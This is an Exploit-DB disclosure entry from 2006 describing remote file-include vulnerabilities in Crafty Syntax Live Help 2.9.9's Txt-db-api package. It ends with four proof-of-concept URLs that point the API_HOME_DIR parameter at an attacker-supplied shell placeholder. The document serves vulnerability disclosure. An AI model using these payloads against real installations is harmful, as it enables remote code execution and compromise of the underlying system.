Crafty Syntax Live Help 2.9.9 - Multiple Remote File Include Vulnerabilities

2006-10-24T00:00:00
ID EDB-ID:28851
Type exploitdb
Reporter Crackers_Child
Modified 2006-10-24T00:00:00

Description

Crafty Syntax Live Help 2.9.9 Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20711/info

Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Note that these issues affect only the version of Crafty Syntax Live Help that includes the Text Based Database Support package (Txt-db-api).

Version 2.9.9 is vulnerable; other versions may also be affected.

http://www.example.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?